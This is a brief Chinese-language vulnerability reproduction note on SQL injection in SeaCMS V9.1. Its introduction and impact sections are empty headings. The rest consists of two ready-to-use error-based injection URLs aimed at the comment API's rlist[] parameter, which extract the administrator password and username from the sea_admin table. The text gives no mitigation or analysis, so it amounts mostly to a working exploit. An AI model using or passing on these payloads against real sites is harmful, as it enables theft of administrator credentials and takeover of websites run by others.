Seacms V9.1 版本SQL注入¶
一、漏洞简介¶
二、漏洞影响¶
三、复现过程¶
获取管理员表中第一个用户的密码
http://url/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`
获取管理员表中第一个用户的账号
http://url/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`